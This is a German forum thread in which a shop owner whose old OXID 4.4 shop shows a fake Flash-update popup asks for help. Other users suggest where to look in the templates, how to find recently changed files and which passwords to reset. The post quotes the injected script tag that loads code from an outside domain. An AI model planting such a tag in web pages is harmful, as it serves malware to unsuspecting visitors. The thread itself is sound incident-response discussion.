Bin gehackt worden HILFE

hi

sorry ich habs eilig brauche schnell hilfe!

ich hab nen alten qxid shop 4.4
und wenn man nun die seite aufruft kommt so eine gefaked meldung von wegen flash update ist nötig nach einigen sekunden.
diese kann man auch nicht schliessen.
im hintergrund läuft der shop normal.
mit abblock kann ich das blockieren und den shop normal benutzen.
rufe ich den quelltest der seite auf sinde ich ganz am ende

</body>
</html><script type=“text/javascript” src=“http://thartum.kreuzquer.de/cjxf2pyj.php?id=111425410”></script>

2 wichtige fragen

1 wie und wo kann ich das entfernen? ich finde es nirgends?

2 wie kann es dazu gekommen sein??

danke

Hallo
Also nach
</body>
</html>
sollte nichts mehr stehen. Dies kommt aus der Base.tpl.

schreib am besten deinen Hoster an, er kann am besten und schnellsten etwas dagegen unternehmen

evtl. wurde da mit ner sql injection gearbeitet … wobei glaub ich eigentlich sowas nicht aus der db kommt.

ansonsten wirklich in der base.tpl :slight_smile:

In der 4.4x gab es meiner Ansicht noch keine base.tpl. Sollte dann eher _footer.tpl sein.

Wobei das nicht unbedingt sein muss. Der Hack kann überall stehen, denn JS ist durchaus in der Lage, die Tags zu ersetzen.

via Ftp die Dateien nach Änderungsdatum sortieren und in die mit dem neuesten Datum reinschauen.

ALLE Passwörter sofort ändern, ftp wie SQL und auch Admin-Zugang.

*** von unterwegs via Tapatalk ***

Benutzt du Filezilla und hast dort die Passwörter gespeichert?

Ist auf dem Server noch was drauf? Dann nicht nur die Shopdateien prüfen. Wir hatten noch einen alten und vergessenen oscommerce-Shop drauf, über den der Hacker sich 2male Zugang verschafft hat.